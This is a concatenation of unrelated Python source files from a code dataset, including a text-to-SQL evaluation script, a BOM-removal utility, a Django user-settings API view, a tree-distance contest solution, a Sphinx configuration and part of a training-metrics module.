\"YEAR\\s*\\(\\s*CURDATE\\s*\\(\\s*\\)\\s*\\)\\s*\", \"2020\", query, flags=re.IGNORECASE\n )\n\n# get the database cursor for a sqlite database path\ndef get_cursor_from_path(sqlite_path: str):\n try:\n if not os.path.exists(sqlite_path):\n print(\"Openning a new connection %s\" % sqlite_path)\n connection = sqlite3.connect(sqlite_path)\n except Exception as e:\n print(sqlite_path)\n raise e\n connection.text_factory = lambda b: b.decode(errors=\"ignore\")\n cursor = connection.cursor()\n return cursor\n\nasync def exec_on_db_(sqlite_path: str, query: str) -> Tuple[str, Any]:\n query = replace_cur_year(query)\n cursor = get_cursor_from_path(sqlite_path)\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n cursor.close()\n cursor.connection.close()\n return \"result\", result\n except Exception as e:\n cursor.close()\n cursor.connection.close()\n return \"exception\", e\n \nasync def exec_on_db(\n sqlite_path: str, query: str, process_id: str = \"\", timeout: int = TIMEOUT\n) -> Tuple[str, Any]:\n try:\n return await asyncio.wait_for(exec_on_db_(sqlite_path, query), timeout)\n except asyncio.TimeoutError:\n return ('exception', TimeoutError)\n except Exception as e:\n return (\"exception\", e)\n\ndef get_constraint_permutation(tab1_sets_by_columns: List[Set], result2: List[Tuple]):\n num_cols = len(result2[0])\n perm_constraints = [{i for i in range(num_cols)} for _ in range(num_cols)]\n if num_cols <= 3:\n return product(*perm_constraints)\n\n # we sample 20 rows and constrain the space of permutations\n for _ in range(20):\n random_tab2_row = random.choice(result2)\n\n for tab1_col in range(num_cols):\n for tab2_col in set(perm_constraints[tab1_col]):\n if random_tab2_row[tab2_col] not in tab1_sets_by_columns[tab1_col]:\n perm_constraints[tab1_col].remove(tab2_col)\n return product(*perm_constraints)\n\n\ndef permute_tuple(element: Tuple, perm: Tuple) -> Tuple:\n assert len(element) == len(perm)\n return tuple([element[i] for i in perm])\n\ndef unorder_row(row: Tuple) -> Tuple:\n return tuple(sorted(row, key=lambda x: str(x) + str(type(x))))\n\ndef quick_rej(result1: List[Tuple], result2: List[Tuple], order_matters: bool) -> bool:\n s1 = [unorder_row(row) for row in result1]\n s2 = [unorder_row(row) for row in result2]\n if order_matters:\n return s1 == s2\n else:\n return set(s1) == set(s2)\n\n# return whether two bag of relations are equivalent\ndef multiset_eq(l1: List, l2: List) -> bool:\n if len(l1) != len(l2):\n return False\n d = defaultdict(int)\n for e in l1:\n d[e] = d[e] + 1\n for e in l2:\n d[e] = d[e] - 1\n if d[e] < 0:\n return False\n return True\n\ndef result_eq(result1: List[Tuple], result2: List[Tuple], order_matters: bool) -> bool:\n if len(result1) == 0 and len(result2) == 0:\n return True\n\n if len(result1) != len(result2):\n return False\n\n num_cols = len(result1[0])\n\n if len(result2[0]) != num_cols:\n return False\n\n if not quick_rej(result1, result2, order_matters):\n return False\n\n\n tab1_sets_by_columns = [{row[i] for row in result1} for i in range(num_cols)]\n\n for perm in get_constraint_permutation(tab1_sets_by_columns, result2):\n if len(perm) != len(set(perm)):\n continue\n if num_cols == 1:\n result2_perm = result2\n else:\n result2_perm = [permute_tuple(element, perm) for element in result2]\n if order_matters:\n if result1 == result2_perm:\n return True\n else:\n if set(result1) == set(result2_perm) and multiset_eq(result1, result2_perm):\n return True\n return False\n\n\ndef eval_exec_match(db, p_str, g_str):\n\n p_str, g_str = postprocess(p_str), postprocess(g_str)\n \n p_str = remove_distinct(p_str)\n g_str = remove_distinct(g_str)\n\n order_matters = 'order by' in g_str.lower()\n\n db_dir = os.path.dirname(db)\n db_paths = [os.path.join(db_dir, basename) for basename in os.listdir(db_dir) if '.sqlite' in basename]\n\n preds = [p_str]\n\n for pred in preds:\n ranger = db_paths\n pred_passes = 1\n for db_path in ranger:\n g_flag, g_denotation = asyncio.run(exec_on_db(db_path, g_str))\n p_flag, p_denotation = asyncio.run(exec_on_db(db_path, pred))\n\n # we should expect the gold to be succesfully executed on the database\n assert g_flag != 'exception', 'gold query %s has error on database file %s' % (g_str, db_path)\n\n # wrong if execution fails\n if p_flag == 'exception':\n pred_passes = 0\n\n # if denotations are not equivalent, the prediction must be wrong\n elif not result_eq(g_denotation, p_denotation, order_matters=order_matters):\n pred_passes = 0\n if pred_passes == 0:\n break\n\n # the model prediction has the same denotation as the gold for all databases\n if pred_passes == 1:\n return 1\n\n # none of the predictions passed\n return 0\n\n# Rebuild SQL functions for value evaluation\ndef rebuild_cond_unit_val(cond_unit):\n if cond_unit is None or not DISABLE_VALUE:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n if type(val1) is not dict:\n val1 = None\n else:\n val1 = rebuild_sql_val(val1)\n if type(val2) is not dict:\n val2 = None\n else:\n val2 = rebuild_sql_val(val2)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_val(condition):\n if condition is None or not DISABLE_VALUE:\n return condition\n\n res = []\n for idx, it in enumerate(condition):\n if idx % 2 == 0:\n res.append(rebuild_cond_unit_val(it))\n else:\n res.append(it)\n return res\n\n\ndef rebuild_sql_val(sql):\n if sql is None or not DISABLE_VALUE:\n return sql\n\n sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])\n sql['having'] = rebuild_condition_val(sql['having'])\n sql['where'] = rebuild_condition_val(sql['where'])\n sql['intersect'] = rebuild_sql_val(sql['intersect'])\n sql['except'] = rebuild_sql_val(sql['except'])\n sql['union'] = rebuild_sql_val(sql['union'])\n\n return sql\n\n\n# Rebuild SQL functions for foreign key evaluation\ndef build_valid_col_units(table_units, schema):\n col_ids = [table_unit[1] for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]\n prefixs = [col_id[:-2] for col_id in col_ids]\n valid_col_units= []\n for value in schema.idMap.values():\n if '.' in value and value[:value.index('.')] in prefixs:\n valid_col_units.append(value)\n return valid_col_units\n\n\ndef rebuild_col_unit_col(valid_col_units, col_unit, kmap):\n if col_unit is None:\n return col_unit\n\n agg_id, col_id, distinct = col_unit\n if col_id in kmap and col_id in valid_col_units:\n col_id = kmap[col_id]\n if DISABLE_DISTINCT:\n distinct = None\n return agg_id, col_id, distinct\n\n\ndef rebuild_val_unit_col(valid_col_units, val_unit, kmap):\n if val_unit is None:\n return val_unit\n\n unit_op, col_unit1, col_unit2 = val_unit\n col_unit1 = rebuild_col_unit_col(valid_col_units, col_unit1, kmap)\n col_unit2 = rebuild_col_unit_col(valid_col_units, col_unit2, kmap)\n return unit_op, col_unit1, col_unit2\n\n\ndef rebuild_table_unit_col(valid_col_units, table_unit, kmap):\n if table_unit is None:\n return table_unit\n\n table_type, col_unit_or_sql = table_unit\n if isinstance(col_unit_or_sql, tuple):\n col_unit_or_sql = rebuild_col_unit_col(valid_col_units, col_unit_or_sql, kmap)\n return table_type, col_unit_or_sql\n\n\ndef rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):\n if cond_unit is None:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n val_unit = rebuild_val_unit_col(valid_col_units, val_unit, kmap)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_col(valid_col_units, condition, kmap):\n for idx in range(len(condition)):\n if idx % 2 == 0:\n condition[idx] = rebuild_cond_unit_col(valid_col_units, condition[idx], kmap)\n return condition\n\n\ndef rebuild_select_col(valid_col_units, sel, kmap):\n if sel is None:\n return sel\n distinct, _list = sel\n new_list = []\n for it in _list:\n agg_id, val_unit = it\n new_list.append((agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap)))\n if DISABLE_DISTINCT:\n distinct = None\n return distinct, new_list\n\n\ndef rebuild_from_col(valid_col_units, from_, kmap):\n if from_ is None:\n return from_\n\n from_['table_units'] = [rebuild_table_unit_col(valid_col_units, table_unit, kmap) for table_unit in from_['table_units']]\n from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)\n return from_\n\n\ndef rebuild_group_by_col(valid_col_units, group_by, kmap):\n if group_by is None:\n return group_by\n\n return [rebuild_col_unit_col(valid_col_units, col_unit, kmap) for col_unit in group_by]\n\n\ndef rebuild_order_by_col(valid_col_units, order_by, kmap):\n if order_by is None or len(order_by) == 0:\n return order_by\n\n direction, val_units = order_by\n new_val_units = [rebuild_val_unit_col(valid_col_units, val_unit, kmap) for val_unit in val_units]\n return direction, new_val_units\n\n\ndef rebuild_sql_col(valid_col_units, sql, kmap):\n if sql is None:\n return sql\n\n sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)\n sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)\n sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)\n sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)\n sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)\n sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)\n sql['intersect'] = rebuild_sql_col(valid_col_units, sql['intersect'], kmap)\n sql['except'] = rebuild_sql_col(valid_col_units, sql['except'], kmap)\n sql['union'] = rebuild_sql_col(valid_col_units, sql['union'], kmap)\n\n return sql\n\n\nevaluator = Evaluator()\nlevels = ['easy', 'medium', 'hard', 'extra', 'all']\npartial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\nentries = []\nscores = {}\n\nfor level in levels:\n scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}\n scores[level]['exec'] = 0\n for type_ in partial_types:\n scores[level]['partial'][type_] = {'acc': 0., 'rec': 0., 'f1': 0.,'acc_count':0,'rec_count':0}\n\n\nfor i, (p, g) in enumerate(zip(plist, glist)):\n if (i + 1) % 10 == 0:\n print('Evaluating %dth prediction' % (i + 1))\n for idx, pg in tqdm(enumerate(zip(p, g))):\n p, g = pg\n p_str = p[0]\n p_str = p_str.replace(\"value\", \"1\")\n g_str, db = g\n db_name = db\n db = os.path.join(database, db, db + \".sqlite\")\n schema = Schema(get_schema(db))\n g_sql = get_sql(schema, g_str)\n hardness = evaluator.eval_hardness(g_sql)\n if idx > 3:\n idx = \"> 4\"\n else:\n idx += 1\n scores[hardness]['count'] += 1\n scores['all']['count'] += 1\n\n try:\n p_sql = get_sql(schema, p_str)\n except:\n p_sql = {\n \"except\": None,\n \"from\": {\n \"conds\": [],\n \"table_units\": []\n },\n \"groupBy\": [],\n \"having\": [],\n \"intersect\": None,\n \"limit\": None,\n \"orderBy\": [],\n \"select\": [\n False,\n []\n ],\n \"union\": None,\n \"where\": []\n }\n\n exec_score = eval_exec_match(db=db, p_str=p_str, g_str=g_str)\n if exec_score:\n scores[hardness]['exec'] += 1\n scores['all']['exec'] += 1\n\n kmaps = build_foreign_key_map_from_json(tables)\n\n kmap = kmaps[db_name]\n g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)\n g_sql = rebuild_sql_val(g_sql)\n g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)\n p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)\n p_sql = rebuild_sql_val(p_sql)\n p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)\n exact_score = evaluator.eval_exact_match(p_sql, g_sql)\n partial_scores = evaluator.partial_scores\n\n # if exact_score == 0:\n # print(\"{} pred: {}\".format(hardness, p_str))\n # print(\"{} gold: {}\".format(hardness, g_str))\n # print(\"\")\n scores[hardness]['exact'] += exact_score\n scores['all']['exact'] += exact_score\n\n for type_ in partial_types:\n # print(partial_scores[type_]['acc'], partial_scores[type_]['rec'], partial_scores[type_]['f1'])\n if partial_scores[type_]['pred_total'] > 0:\n scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores[hardness]['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores[hardness]['partial'][type_]['rec_count'] += 1\n\n scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n if partial_scores[type_]['pred_total'] > 0:\n scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']\n scores['all']['partial'][type_]['acc_count'] += 1\n if partial_scores[type_]['label_total'] > 0:\n scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']\n scores['all']['partial'][type_]['rec_count'] += 1\n\n scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n entries.append({\n 'predictSQL': p_str,\n 'goldSQL': g_str,\n 'hardness': hardness,\n 'exact': exact_score,\n 'partial': partial_scores\n })\n\nwith open(\"rat-sql/evaluation/data/metrics.txt\", 'w') as file:\n\n file.write('-------------- METRICS --------------\\n\\n')\n\n types = ['all', 'easy', 'medium', 'hard', 'extra']\n partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\n\n for type in types:\n if type == 'all':\n file.write('Across all hardness level\\n')\n else:\n file.write('\\n===========================================\\n\\n')\n file.write('HARDNESS: ' + str(type) + '\\n')\n\n count = scores[type]['count']\n file.write('Total number of queries: ' + str(count) + '\\n\\n')\n\n exact_match = scores[type]['exact']\n acc = round(exact_match / count , 3)\n \n exec_match = scores[type]['exec']\n exec_acc = round(exec_match / count , 3)\n\n file.write('Overal scores\\n')\n file.write('---------------\\n')\n file.write('(Logical form) Exact match accuarcy: ' + str(acc) + '\\n')\n file.write('Execution accuarcy: ' + str(exec_acc) + '\\n\\n')\n\n file.write('Component matching accuracy \\n')\n file.write('----------------------------\\n')\n\n for partial_type in partial_types:\n partial_count = scores[type]['partial'][partial_type]['acc_count']\n partial_match = scores[type]['partial'][partial_type]['acc']\n\n if partial_count == 0:\n file.write(partial_type + \": 0\" + '\\n')\n else:\n partial_acc = round(partial_match / partial_count, 3)\n file.write(partial_type + \": \" + str(partial_acc) + '\\n')\n\n file.write('\\nPartial Component matching (F1) accuracy \\n')\n file.write('----------------------------\\n')\n\n for partial_type in partial_types:\n partial_f1_match = scores[type]['partial'][partial_type]['f1']\n partial_f1_acc = round(partial_f1_match / count, 3)\n file.write(partial_type + \": \" + str(partial_f1_acc) + '\\n')\n ","repo_name":"PrachiJainxD/text-to-sql","sub_path":"roberta/evaluation/evaluation_script.py","file_name":"evaluation_script.py","file_ext":"py","file_size_in_byte":31269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2487061611","text":"import os\n\n\ndef removeBom(file):\n '''移除UTF-8文件的BOM字节'''\n BOM = b'\\xef\\xbb\\xbf'\n existBom = lambda s: True if s == BOM else False\n\n f = open(file, 'rb')\n if existBom(f.read(3)):\n fbody = f.read()\n # f.close()\n with open(file, 'wb') as f:\n f.write(fbody)\n\n\nif __name__ == '__main__':\n for root, dirs, files in os.walk(\"./\"):\n count = 0\n for file in files:\n #if file.find(\".txt\") != -1:\n removeBom(os.path.join(root, file))\n count += 1\n print(count)\n","repo_name":"livejq/AutoScripts","sub_path":"python/utf8/utf8_bom_to_utf8.py","file_name":"utf8_bom_to_utf8.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"1596951455","text":"import ast\nimport json\nimport logging\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\nfrom apps.user.models import User as UserModel\n\nfrom apps.indicator.models import Price as PriceModel\nfrom settings import TEAM_EMOJIS\n\nlogger = logging.getLogger(__name__)\n\nclass User(View):\n @csrf_exempt\n def dispatch(self, request, *args, **kwargs):\n return super(User, self).dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n try:\n chat_id = request.POST.get('chat_id', \"\")\n if not len(chat_id):\n return HttpResponse(400) # request error\n user, u_created = UserModel.objects.get_or_create(telegram_chat_id=chat_id)\n\n if request.POST.get('is_subscribed', 'NA').upper() == \"TRUE\":\n user.is_subscribed = True\n elif request.POST.get('is_subscribed', 'NA').upper() == \"FALSE\":\n user.is_subscribed = False\n\n if request.POST.get('token', None):\n token = request.POST.get('token')\n user.set_subscribe_token(token)\n\n if request.POST.get('is_muted', 'NA').upper() == \"TRUE\":\n user.is_muted = True\n elif request.POST.get('is_muted', 'NA').upper() == \"FALSE\":\n user.is_muted = False\n\n if request.POST.get('risk', 'NA') in ['low', 'medium', 'high']:\n risk_string = request.POST['risk']\n user.risk = user.get_risk_value(risk_string)\n assert user.risk == user.get_risk_value()\n\n if request.POST.get('horizon', 'NA') in ['short', 'medium', 'long']:\n horizon_string = request.POST['horizon']\n user.horizon = user.get_horizon_value(horizon_string)\n assert user.horizon == user.get_horizon_value()\n\n user.save()\n\n return HttpResponse(json.dumps(user.get_telegram_settings())) # ok\n\n except Exception as e:\n logger.debug(str(e))\n return HttpResponse(json.dumps({'error':str(e)}), status=500) # server error\n\n def get(self, request, *args, **kwargs):\n\n chat_id = request.GET.get('chat_id', \"\")\n if not len(chat_id):\n return HttpResponse(400) # request error\n\n user, u_created = UserModel.objects.get_or_create(telegram_chat_id=chat_id)\n # return HttpResponse(json.dumps(user.get_telegram_settings())) # ok\n return HttpResponse(json.dumps({})) # ok\n\n\nclass Users(View):\n def dispatch(self, request, *args, **kwargs):\n return super(Users, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n # Filter for authorized users #\n\n users = UserModel.objects.filter(subscribed_since__isnull=False, is_muted=False)\n\n if request.GET.get('beta_token_valid', \"NA\").upper() == \"TRUE\":\n users = users.exclude(_beta_subscription_token__exact=\"\")\n if request.GET.get('beta_token_valid', \"NA\").upper() == \"FALSE\":\n users = users.filter(_beta_subscription_token__exact=\"\")\n\n if request.GET.get('is_ITT_team', \"NA\").upper() == \"TRUE\":\n users = users.filter(is_ITT_team=True)\n if request.GET.get('is_ITT_team', \"NA\").upper() == \"FALSE\":\n users = users.filter(is_ITT_team=False)\n\n # Filter for user preferences #\n\n risk_string = request.GET.get('risk', 'all')\n assert risk_string in ['low', 'medium', 'high', 'all']\n if risk_string is not 'all':\n users = users.filter(risk = UserModel.get_risk_value(UserModel, risk_string))\n\n horizon_string = request.GET.get('horizon', 'all')\n assert horizon_string in ['short', 'medium', 'long', 'all']\n if horizon_string is not 'all':\n users = users.filter(horizon=UserModel.get_horizon_value(UserModel, horizon_string))\n\n # Filters done, compile chat ids #\n\n chat_id_list = list(users.values_list('telegram_chat_id', flat=True))\n # return HttpResponse(json.dumps({'chat_ids': chat_id_list})) # ok\n return HttpResponse(json.dumps({})) # ok\n","repo_name":"kamleshahire/core","sub_path":"apps/api/views/v1_user.py","file_name":"v1_user.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32369569687","text":"import sys\nsys.setrecursionlimit( 10 ** 8 )\n\nN = int( input() )\nuv = [ tuple( map( int, input().split() ) ) for _ in range( N - 1 ) ]\n\nconnect = [ [] for _ in range( N ) ]\nfor u, v in uv:\n connect[ u - 1 ].append( v - 1 )\n connect[ v - 1 ].append( u - 1 )\n\nsize = [ 0 for _ in range( N ) ]\n# size[ u ] = 頂点uを根とする部分木の頂点数\nvisited = [ False ] * N\ndepth = [ 0 ] * N\n\ndef calc_size( v ):\n # 頂点vを根とする部分木の頂点数を計算\n size[ v ] += 1\n visited[ v ] = True\n for u in connect[ v ]:\n if visited[ u ] == False:\n depth[ u ] = depth[ v ] + 1\n calc_size( u )\n size[ v ] += size[ u ]\n\ncalc_size( 0 )\n# print( size, depth )\n\nans = [ sum( depth ) ] + [ -1 ] * ( N - 1 )\n# ans[ i ] = i行目の答え\n\nfrom collections import deque\nqueue = deque( [ 0 ] )\nwhile queue:\n v = queue.popleft()\n ans_v = ans[ v ]\n for u in connect[ v ]:\n if ans[ u ] == -1:\n ans[ u ] = ans_v - size[ u ] + ( N - size[ u ] )\n # 根をvからuに変えると,uの部分木に含まれる頂点は根からの距離が1減り,\n # それ以外の頂点は根からの距離が1増える\n \n queue.append( u )\n\nprint( *ans, sep = \"\\n\" )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ABC/220/abc220-f.py","file_name":"abc220-f.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8253453292","text":"import os\nimport re\nimport sys\n\nsys.path.insert(0, os.path.abspath(\"../..\"))\n\n# -- Project information -----------------------------------------------------\n\nproject = \"mutapath\"\ncopyright = \"2023, 'matfax'\"\nauthor = \"'matfax'\"\n\nrelease = re.sub(\"^v\", \"\", os.popen(\"git describe --tags\").read().strip())\nversion = release\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"m2r2\",\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.autosectionlabel\",\n \"sphinx.ext.autosummary\",\n \"sphinx_rtd_theme\",\n \"sphinx.ext.linkcode\",\n \"sphinx.ext.intersphinx\",\n \"docs.attributes\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"sphinx_rtd_theme\"\n\nhtml_css_files = [\n \"style.css\",\n]\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"static\"]\n\nmaster_doc = \"index\"\n\nm2r_parse_relative_links = True\nm2r_anonymous_references = True\n\nautoclass_content = \"both\"\nautodoc_mock_imports = [\"shutil\", \"pathlib\", \"os\", \"filelock\", \"path\"]\nautosectionlabel_prefix_document = True\nautosummary_generate = True\nautosummary_imported_members = True\n\nintersphinx_mapping = {\n \"python\": (\"https://docs.python.org/3\", None),\n \"path\": (\"https://path.readthedocs.io/en/stable/\", None),\n \"filelock\": (\"https://py-filelock.readthedocs.io/en/latest/\", None),\n}\n\n\ndef linkcode_resolve(domain, info):\n if domain != \"py\":\n return None\n if not info[\"module\"]:\n return None\n filename = info[\"module\"].replace(\".\", \"/\")\n return \"https://github.com/matfax/mutapath/blob/main/mutapath/%s.py\" % filename\n","repo_name":"matfax/mutapath","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25625836358","text":"from curses.ascii import isdigit, isspace\nfrom lib2to3.pgen2 import token\nimport pathlib\nimport os\nimport sys\nimport getopt\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch import true_divide\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text # or whatever\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef handle( container, index, root):\n print(root)\n block = container[index]\n res = []\n if index == 0:\n for line in block:\n tokens = line.split()\n if tokens[0] == root:\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n if tokens[0].endswith(':'):\n res.append(tokens[1])\n elif index == 1:\n flick = False\n for line in block:\n tokens = line.split()\n if flick:\n res.append(tokens)\n if tokens[0] == '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------':\n flick = True\n elif index == 2:\n flick = False\n for line in block:\n tokens = line.split()\n if flick:\n res.append(tokens)\n if tokens[0] == '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------':\n flick = True\n elif index == 3:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n elif is_number(token[:-1]):\n res.append(token[:-1])\n elif index == 4:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n elif is_number(token[:-1]):\n res.append(token[:-1])\n elif index == 6:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n \n return res\n \ndef getOp(root, dataPath):\n rempref = root.removeprefix(dataPath)\n remsuff = rempref.split(',')[0]\n return remsuff\n\ndef handleData(dataPath, processedRes, drawFile):\n files = os.listdir(dataPath)\n for file in files:\n filePath = dataPath+str(file)\n f = open(filePath, 'r')\n op = getOp( filePath, dataPath + 'bmk_')\n \n lines = f.readlines()\n cntEmpty = 0\n lineN = 0\n block = []\n container = []\n lib = []\n\n for line in lines:\n lineN += 1\n if line.isspace():\n cntEmpty += 1\n if len(block) != 0:\n container.append(block)\n block = []\n continue\n #if line != 'Initializing RocksDB Options from the specified file\\n' and line != 'Initializing RocksDB Options from command-line flags\\n':\n block.append(line)\n\n with open(processedRes + str(file)+'.txt','w') as f:\n for i in range(0, len(container)):\n filtRes = handle(container, i, op)\n print(str(filtRes), file=f) \n\nif __name__ == '__main__':\n n = len(sys.argv)\n dirName = str(sys.argv[1])\n \n dataPath = str(os.getcwd()) + '/'+ dirName + '/'\n processedRes = str(os.getcwd()) + '/processed_' + dirName + '/'\n drawFile = str(os.getcwd()) + '/'+ dirName + '/' + 'collectedList'\n print(dataPath, dirName, processedRes)\n \n if not (os.path.exists(processedRes)):\n os.makedirs(processedRes)\n\n handleData(dataPath, processedRes, drawFile)","repo_name":"108062138/filterIndepData","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33987314167","text":"import csv\nwith open('output_5_test.txt', 'r') as file:\n\treader = csv.reader(file, delimiter=\" \") # delimiter takes the one character string \\t representing tab to specify the field separator\n\td = list(reader) # creates a list in variable d containing the elements in reader\noutput = open('output_5_test_clean.txt', 'w')\n\t\nn=0\nreplace=0\n\nfor element in d:\n\tline = d[n]\n\tm=0\n\tfor word in line:\n\t\treplace=0\n\t\tfor letter in word:\n\t\t\tif letter=='_':\n\t\t\t\thead, middle, tail = word.partition('_')\n\t\t\t\treplace=1\t\n\t\tif replace==1:\n\t\t\toutput.write(str(head)+' ')\n\t\telse:\n\t\t\toutput.write(str(word)+' ')\n\toutput.write('\\n')\n\tn=n+1\noutput.close()","repo_name":"matthewberryman/somerton-man","sub_path":"Python/Cleanup/cleanup_test.py","file_name":"cleanup_test.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74317857049","text":"import operator\n\nfrom flax.core import freeze\nfrom init2winit.hessian.precondition import make_diag_preconditioner\nfrom init2winit.model_lib import model_utils\nfrom init2winit.optimizer_lib import utils as optimizer_utils\nfrom init2winit.utils import total_tree_norm_l2\nfrom init2winit.utils import total_tree_norm_sql2\nfrom init2winit.utils import total_tree_sum\nimport jax\nimport jax.numpy as jnp\nfrom ml_collections import ConfigDict\n\n# The TrainingMetricsGrabber configs will be these defaults overridden\n# by any overrides passsed to TrainingMetricsGrabber.create.\n# See the class doc string for an overview of the keys and what they mean.\nDEFAULT_CONFIG = ConfigDict({\n 'ema_beta': 0.9,\n 'enable_train_cost': False,\n 'enable_param_norms': False,\n 'enable_gradient_norm': False,\n 'enable_all_gradient_norms': False,\n 'enable_batch_stats_norm': False,\n 'enable_all_batch_stats_norms': False,\n 'enable_update_norm': False,\n 'enable_update_norms': False,\n 'enable_preconditioner_normsq': False,\n 'enable_semip_grad_normsq': False,\n 'enable_ema': False,\n 'optstate_sumsq_fields': [],\n 'optstate_sumsq_param_wise_fields': [],\n 'optstate_sum_fields': [],\n 'optstate_sum_param_wise_fields': [],\n 'enable_grafting_norms': False,\n})\n\n\ndef make_training_metrics(num_train_steps, hps, **config_overrides):\n \"\"\"Creates functions for managing training metrics.\n\n Training metrics are handled in a functional, \"jax-onic\" way, similar to\n optax optimizers: there is a state pytree (whose precise structure depends\n on the config settings), and a set of functions to manipulate that state.\n\n The three functions are:\n (1) an initializer, which initializes the training metrics state\n (given the network param shapes);\n (2) an updater, which updates the training metrics state; and\n (3) a summarizer, which summarizes the training metrics state into a summary\n tree.\n\n The behavior of these functions is customizable via the configs. The\n final configs used to configure the training metrics functionality are a\n combination of (1) the default configs in DEFAULT_CONFIG, and (2) the\n config overrides passed as arguments to this function.\n\n The config keys and their meanings are:\n - enable_train_cost (bool): if true, the metrics state will have a field\n \"train_cost\" which is a jnp array of length num_train_steps, and which\n stores the train cost at every step of training (padded by zeros).\n - enable_param_norms (bool): if true, the metrics state will have a field\n \"param_norms\" which is a pytree in the shape of the model params whose\n leaves are jnp arrays of length num_train_steps.\n - enable_gradient_norm (bool) if true, the metrics state will have a field\n \"gradient_norm\" which is a jnp array of length num_train_steps\n containing a time series of the overall gradient norm.\n - enable_update_norm (bool) if true, the metrics state will have a field\n \"update_norm\" which is a jnp array of length num_train_steps containing\n a time series of the overall update norm.\n - enable_update_norms (bool) if true, the metrics state will have a field\n \"update_norms\" which is a pytree in the shape of the model params whose\n leaves are jnp arrays of length num_train_steps.\n - enable_ema (bool): if true, the metrics state will have fields \"grad_ema\",\n \"grad_sq_ema\", \"update_ema\", and \"update_sq_ema\" containing\n exponential moving averages of the gradient, update, elementwise squared\n gradient, and elementwise squared update; and the summary tree will\n contain estimates of the gradient variance and update variance.\n - ema_beta (float): if enable_ema=true, the EMA's will use this value for\n their \"beta\" averaging parameter.\n - optstate_sumsq_fields (list of str): record the squared Euclidean norm 